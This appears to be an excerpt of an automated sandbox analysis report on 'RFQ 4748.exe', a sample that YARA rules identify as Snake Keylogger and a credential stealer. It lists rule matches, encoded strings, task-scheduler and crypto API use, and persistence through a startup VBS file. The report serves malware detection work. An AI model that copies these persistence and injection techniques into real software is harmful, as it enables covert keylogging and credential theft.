                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064170506_2_06417050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064128076_2_06412807
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064100066_2_06410006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064128186_2_06412818
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641D0186_2_0641D018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064144306_2_06414430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064108E06_2_064108E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064108F06_2_064108F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064178F06_2_064178F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064104886_2_06410488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641B08F6_2_0641B08F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064174976_2_06417497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064104986_2_06410498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064174A86_2_064174A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06410D486_2_06410D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06417D486_2_06417D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06417D586_2_06417D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064179006_2_06417900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641BD286_2_0641BD28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06410D396_2_06410D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641C9C86_2_0641C9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064185FC6_2_064185FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641518A6_2_0641518A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064111916_2_06411191
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064151986_2_06415198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064181A06_2_064181A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064181B06_2_064181B0
                  Source: RFQ 4748.exeBinary or memory string: OriginalFilename vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.00000000031F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAworjf.dll" vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000000.2024179375.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2104276177.0000000006910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAworjf.dll" vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2103664815.00000000060E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003E38000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2105699680.0000000006C60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs RFQ 4748.exe
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002E87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ 4748.exe
                  Source: RFQ 4748.exeBinary or memory string: OriginalFilenamePboipecgady.exe8 vs RFQ 4748.exe
                  Source: RFQ 4748.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: RFQ 4748.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: Fallback.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, Rt-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, Rt-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                  Source: RFQ 4748.exe, -.csBase64 encoded string: 'h/9JrGQ0+tRfvm08t/JTt293lfVJvWw7uP8Bn2QtkehOqngYp/VftWM1rb1dvXUGkvNWtE84ueMBt3EGnehfqXQ4uO9OoTo+sfJllGQ3s/JS40Y8oNJDqGQfpulXkGA3sOpf42Y8oNl0uWw8789UvGQhm+ABimQ4sNVOqmg3s717vGVis+NOh1E2p+9OsW437+FfrF4aofRIvW8tkOlXuWg379VfrEU4oOcB6jhs4bQBmXIqsetYtHgKsfRMvXNih+9XqG08lfVJvWw7uP9/oHE1u/Rfqjo7teRftHc07/VXt2o8oONJrA=='
                  Source: Fallback.exe.0.dr, -.csBase64 encoded string: 'h/9JrGQ0+tRfvm08t/JTt293lfVJvWw7uP8Bn2QtkehOqngYp/VftWM1rb1dvXUGkvNWtE84ueMBt3EGnehfqXQ4uO9OoTo+sfJllGQ3s/JS40Y8oNJDqGQfpulXkGA3sOpf42Y8oNl0uWw8789UvGQhm+ABimQ4sNVOqmg3s717vGVis+NOh1E2p+9OsW437+FfrF4aofRIvW8tkOlXuWg379VfrEU4oOcB6jhs4bQBmXIqsetYtHgKsfRMvXNih+9XqG08lfVJvWw7uP9/oHE1u/Rfqjo7teRftHc07/VXt2o8oONJrA=='
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, ---.csBase64 encoded string: 'tDysr3FCpidoAN5BPVVKGAzRN9Rq8atHi4KbgoyHr59UUHCLtjp9nj46vEtJy/aB'
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: 0.2.RFQ 4748.exe.3e61570.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                  Source: 0.2.RFQ 4748.exe.6c60000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbs"
                  Source: RFQ 4748.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: RFQ 4748.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
